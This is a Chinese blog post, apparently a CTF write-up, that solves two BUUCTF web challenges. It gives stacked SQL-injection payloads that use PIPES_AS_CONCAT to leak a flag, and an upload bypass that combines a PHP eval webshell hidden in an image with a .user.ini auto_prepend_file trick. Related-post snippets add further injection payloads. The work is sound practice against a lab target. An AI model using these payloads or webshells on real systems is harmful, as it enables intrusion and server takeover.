web---学习

最新推荐文章于 2022-06-01 00:20:03 发布
最新推荐文章于 2022-06-01 00:20:03 发布
阅读量422 收藏
点赞数
分类专栏: ctf 文章标签: BUUCTF CheckIn 堆叠注入 easy_SQL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44897902/article/details/102672657
版权

BUUCTF
参考:

https://www.cnblogs.com/0nth3way/articles/7128189.html
https://blog.csdn.net/qq_42181428/article/details/99741920

EasySQL
堆叠注入

https://www.cnblogs.com/0nth3way/articles/7128189.html

虽然我不知道怎么猜测的,反正
数据库语言为:
… POST[‘query’]||flag …
其中||是或者,
非预期:

select *,1||flag from Flag

*匹配所有,即找出Flag表里面的所有;

预期:
首先:参考https://segmentfault.com/a/1190000005936172
在这里插入图片描述
在不知道题目数据库语法的情况下,我真的服;
将sql_mode的值设为PIPES_AS_CONCAT
数据库语言为:set sql_mode=PIPES_AS_CONCAT
这样讲||作为连接字符串的意思,flag就被暴露出来;
原语句变成了:select flag from Flag(假如我没有输入东西,那么POST[‘query’])就是空)
但是题目不允许我不输入,所以我输入:

1;set sql_mode=PIPES_AS_CONCAT

这样原数据库语言就变成了select concat(1,flag) from Flag
那么这样执行会返回一个数组,如图:
在这里插入图片描述
执行成功,数组元素不止一个,那么在后面输入:select 1
这样输出的flag就会和后面的1一起输出;(这个原理不太懂,等之后更新查吧)
所以paylaod为:

1;set sql_mode=PIPES_AS_CONCAT;select 1

得到flag:
在这里插入图片描述

CheckIn

这道题是利用了**nigx和.user.ini的漏洞** 首先进去是一个上传,

在这里插入图片描述
只允许上传图片,并且使用的是php内置的获取图片类型的函数:exif_imagetype();
随便上传一个图片马得到
在这里插入图片描述
过滤了<?,那尝试用
<script language="php">eval($_POST['a'])</script>
构成图片马
上传成功,返回路径
在这里插入图片描述
但是为什么是数组,并且还是五个,我觉得应该是上传一个就把它放到一个文件夹下,并且生成index.php,当然还有上传的3.jpg
抓包之后发现题目服务器采用的不是apache,所以不能上传.htacss,服务器是nigx,尝试解析漏洞
参考:

https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html

我们都知道php.ini是php的配置文件,而且他是一个静态的,虽然可以修改,但是要手动重启之后才能修改;
这里引入一个.user.ini,这也是php的配置文件,而且这个配置文件是动态的,我们修改之后不用重启,等待默认的300s之后会自行发生作用;
并且,.user.ini是一个每一个php文件都会使用的配置文件;
所以这里就产生了漏洞,只要我们在.user.ini文件中写一个包含别的文件,那么那个被包含的文件就会被执行,从而使得一句话木马发挥作用;
在之前已经上传过变形的一句话图片木马之后,继续上传一个.user.ini文件
文件内容为:

#define width 20
#define height 10

auto_prepend_file=3.jpg

这里要细说一下:
为了让.user.ini能顺利上传,我们要绕过exif_imagetype()函数

采用xbm格式X Bit Map,绕过exif_imagetype()方法的检测,上传文件来解析。

在计算机图形学中,X Window系统使用X BitMap,一种纯文本二进制图像格式,用于存储X GUI中使用的光标和图标位图。
XBM数据由一系列包含单色像素数据的静态无符号字符数组组成,当格式被普遍使用时,XBM通常出现在标题.h文件中,每个图像在标题中存储一个数组。

也就是用c代码来标识一个xbm文件,前两个#defines指定位图的高度和宽度【以像素为单位,比如以下xbm文件:

#define test_width 16
#define test_height 7

然后上传,上传成功,访问:http://e34df8dd-cc33-4230-a738-a53228dae5af.node3.buuoj.cn/uploads/f4e7685fe689f675c85caeefaedcf40c/index.php
中国菜刀连接即可;

ring4ring
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
为什么select * || flag from flag 不行呢?
wojiushilsy的博客
04-27 1514
首先*(星号)在SQL语句中有特殊的意义。应该是保留字或关键字 (没找到*(星号)属于什么) 。 所以你直接使用 select * || flag from flag 会报语法错误。 实验一: 这是一张表 查询语句 SELECT *||mpassword FROM rjqm.manager; 结果: 和查询语句 SELECT .||mpassword FROM rjqm.manager; 结果是...
1.实验吧——sql注入1(flag,到底过滤了什么东西? )
qwsn
11-08 3634
0x01:题目 实验吧——sql注入1网址 题目 http://ctf5.shiyanbar.com/423/web/ flag,到底过滤了什么东西? 0x02:WP复现 1.正常访问: http://ctf5.shiyanbar.com/423/web/ #如下图所示 2.输入单引号'测试: 在输入框里输入:' #如图所示,为GET型注入+字符型注入 http:/...
CTF实验吧-WEB专题-2
qq_18661257的专栏
12-19 7480
1.简单的sql注入之2 题解 我们先单引号试一下发现报错,所以基本存在注入,然后我们用空格会爆SQLi detected!因此被过滤了,发现+还是%a0这些编码都会报错,所以只能用万能空格替代/**/,然后测试是否含有flag表,接着测试是否含有flag列,然而并没有什么卵用,因为这货竟然过滤了左右括号,无法用exists判断flag表是否存在,同时由于左右括号不能用,为了让判断flag表存在
[CISCN2019 华北赛区 Day2 Web1]Hack World1
weixin_45808483的博客
01-22 1226
启动环境 题目地址:BUUCTF在线评测 首页提示flag位于flag表的flag字段 直接输入 ;select flag from flag; 显示sql注入检测 单独输入select关键字没有被过滤,说明过滤了空格 使用语句 ;select(flag)from(flag); 因为题目提示flag为uuid,uuid是32位随机字符串,所以需要编写python脚本来获取flag 先写出一个核心的语句,判断flag的第一个字符是否ascii码为101 ...
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3943
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
java-web学习
03-22
Java 是由Sun Microsystems公司于1995年5月推出的高级程序设计语言。 Java可运行于多个平台,如Windows, Mac OS,及其他多种UNIX版本的系统。 本教程通过简单的实例将让大家更好的了解JAVA编程语言。
Web安全学习笔记-Web-Sec Documentation
01-30
Web安全学习知识库 Web安全学习笔记 Web-Sec Documentation
初学web-HBuilder
07-04
初学web-HBuilder
webrtc-web
02-22
webrtc-web开发,学习入门html5的资料。
LR-web-service
08-06
学习的过程是痛苦的成长是坚定的,web-service
BUUOJweb刷题wp(三)
Theseus_sky的博客
09-15 533
强网杯2019随便注 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql
实验吧 web题--注入
yisosooo的博客
09-06 784
1、登陆一下好吗 SQL语句:select * from user where username='用户名' and password='密码' 尝试1'='1并没有得到flag,因为表中没有username=1。于是通过构造1'='0进行注入,并且得到flag。执行的语句为select * from user where username='1'='0' and password='1'='
python sql注入漏洞 ctf_CTF 中的 SQL 注入总结
weixin_39641334的博客
12-09 825
flag 常见表1select flag from flagSQL 注入的基本原理123select * from user where username='' and pass=''# 构造 username=devnull' or '1后,sql 语句变成select * from user where username='devnull' or '1' and pass=''SQLMap1p...
buuctf web小结
qq_42551635的博客
04-25 4559
你传你*呢 .htaccess文件 AddType application/x-httpd-php xxx 本句话的作用是使该.htaccess文件所在目录及其子目录中的后缀为.xxx的文件被Apache当做php文件 一个傻逼错误 var/www/html 是网站根目录,也就等价于 http://55f19d33-bd47-48ac-9734-232c1632f237.node3.buuoj.cn 所以蚁剑里链接时不能重复输入 题解 上传.htaccess文件(注意绕过MIME) 然后上传图片马 ,o
实验吧简单的sql注入解题思路
ZweLL032的博客
03-17 8282
解题思路:研究了好久,看了writeup才知道 1)在文本框输入1,提交,链接变成id=1 2)在文件框输入1‘,提交,报错,判断存在注入。3)初步预计后台表为flag,字段名为flag,需要构造union select flag from flag来执行。 4)根据第二步的报错信息看,多加个‘,后面的语句需要再构造一个条件来结束’,注入语句为:1‘ union select flag fro
BuuCTF-Writeup
m0_61596829的博客
06-01 535
BuuCTF Web: Misc: Crypto:
CTF 中的 SQL 注入总结
重新启程
10-12 4785
flag 常见表 1 select flag from flag SQL 注入的基本原理 1 2 3 select * from user where username='' and pass='' # 构造 username=devnull' or '1后,sql 语句变成 select * from us...
BUUCTF WEB Hack World1
qq_41696858的博客
10-19 2010
经典脚本爆破 打开场景,发现一个输入框,提示要输入数字,鉴于题目上有明确提示,sql注入 那么我们先试试,输入纯数字 输入0回显Error Occured When Fetch Result. 输入1回显Hello, glzjin wants a girlfriend. 输入2回显Do you want to be my girlfriend? 输入大于2的数回显:Error Occured When Fetch Result. 目测是由数字判断回显类型,且有不同回显,就怕不回显呢,那么考虑bool盲注 下
初识CTF Day2 CTFHUB密码口令&SQL注入
suxinAL的博客
09-27 850
前言 接着上次的继续往下做 git泄露结束了,现在开始看svn和hg 正文 首先看一下信息泄露部分的svn和hg 这里使用到一个工具dvcs-ripper 下载地址如下 https://github.com/kost/dvcs-ripper.git (注意:该工具一定要配置环境,具体如下图,或者查看readme.md) 安装好工具就简单了,我是在kali虚拟机里进行使用的 具体指令如下 cd dvcs-ripper-master ./rip-svn.pl -v -u http://challenge-d
dicomweb-client教程
最新发布
07-25
### 回答1: DICOMweb是一个用于医学影像数据传输和交换的标准协议,它基于Web技术,并且可以通过HTTP协议在网络上传输DICOM图像和相关信息。dicomweb-client是一个用于访问DICOMweb服务的客户端工具。下面是关于dicomweb-client的简单教程。 首先,为了使用dicomweb-client,我们需要安装Node.js运行环境。Node.js是一个基于Chrome V8引擎的JavaScript运行环境,它可以让我们在命令行中运行JavaScript脚本。 安装完成后,我们需要使用npm(Node.js的包管理器)来安装dicomweb-client。在命令行中运行以下命令: ``` npm install dicomweb-client ``` 安装完成后,我们可以在JavaScript脚本中使用dicomweb-client来访问DICOMweb服务。首先,我们需要导入dicomweb-client模块: ```javascript const { DICOMwebClient } = require('dicomweb-client'); ``` 然后,我们可以实例化一个DICOMwebClient对象来连接DICOMweb服务器: ```javascript const client = new DICOMwebClient({ url: 'http://your_dicomweb_server_url', }); ``` 接下来,我们可以使用DICOMwebClient对象的方法来执行各种操作。例如,我们可以使用retrieveStudies方法来检索指定患者的研究(study)列表: ```javascript client.retrieveStudies({ queryParams: { PatientID: '1234567890', }, }).then((result) => { console.log(result); }).catch((error) => { console.error(error); }); ``` 这样,我们就可以通过DICOMweb服务检索患者的研究列表,并将结果打印到控制台。 除了检索研究,dicomweb-client还提供了其他功能,如检索系列(series)、检索图像(instance)等。 综上所述,dicomweb-client是一个使用Node.js的DICOMweb客户端工具,它使我们能够通过HTTP协议访问DICOMweb服务,并执行各种操作。通过掌握dicomweb-client的使用,我们可以方便地处理和交换医学影像数据。 ### 回答2: DICOMweb-client是一个用于访问和获取医学图像和信息通信的开源工具。它是一个基于Web的应用程序,可以通过HTTP协议与DICOMweb服务器进行通信,并在浏览器中显示和处理医学影像数据。 Dicomweb-client提供了一套简单易用的API,使开发人员可以轻松地将医学图像集成到自己的应用程序中。使用该工具,用户可以实现DICOM图像的检索、显示、存储和传输等各种功能。 Dicomweb-client的使用教程分为以下几个主要部分: 1. 环境设置:首先,我们需要在本地环境中安装和配置dicomweb-client。这包括安装Node.js和NPM,下载dicomweb-client的代码,并进行一些配置。 2. 连接DICOMweb服务器:在这一步中,我们需要将dicomweb-client配置为连接到相应的DICOMweb服务器。这包括指定服务器的地址、端口号和遵循的DICOMweb协议版本。 3. DICOM图像的检索:通过dicomweb-client,我们可以使用DICOMweb协议实现对DICOM图像的检索。用户可以根据各种检索条件(如患者ID、日期、模态等)来搜索和获取特定的图像数据。 4. 图像显示和处理:一旦我们成功检索到DICOM图像,我们可以使用dicomweb-client在浏览器中显示这些图像。它提供了图像浏览和操作的功能,比如放大、缩小、旋转和窗宽窗位等。 5. 图像的存储和传输:通过dicomweb-client,我们可以将图像数据存储到本地系统中,或者将其传输到其他DICOMweb服务器。这使得我们可以方便地在不同的系统之间共享和交换医学影像数据。 总而言之,dicomweb-client教程提供了一个指导开发人员使用DICOMweb协议访问和处理医学图像的步骤。它使得开发者能够更加轻松地集成DICOM图像到自己的应用程序中,并实现各种图像处理和数据传输的功能。 ### 回答3: dicomweb-client是一个用于与DICOM Web服务器进行通信的工具。它用于检索、存储和传输医学图像和相关信息。 dicomweb-client教程可以帮助用户学习如何使用dicomweb-client工具与DICOM Web服务器进行交互。教程通常会涵盖以下内容: 1. 安装和配置dicomweb-client:教程将提供如何下载、安装和配置dicomweb-client工具的详细说明。这包括设置所需的环境变量、配置文件和认证信息等。 2. 连接DICOM Web服务器:教程将介绍如何使用dicomweb-client建立与DICOM Web服务器的连接。这可能涉及到输入服务器的URL、端口号和身份验证凭据等。 3. 检索医学图像和相关信息:教程将演示如何使用dicomweb-client从DICOM Web服务器检索医学图像和相关信息。这可能包括指定检索条件、过滤结果和处理返回的数据等。 4. 存储医学图像和相关信息:教程将展示如何使用dicomweb-client将医学图像和相关信息存储到DICOM Web服务器。这可能涉及到指定存储位置、格式转换和处理存储结果等。 5. 其他功能和高级用法:教程还可能介绍其他功能和高级用法,如显示DICOM图像、处理DICOM标记、执行DICOM操作和导出数据等。 通过学习dicomweb-client教程,用户可以更好地理解和使用dicomweb-client工具,从而更有效地与DICOM Web服务器进行交互,并在医学图像和相关信息的处理和传输方面取得良好的结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值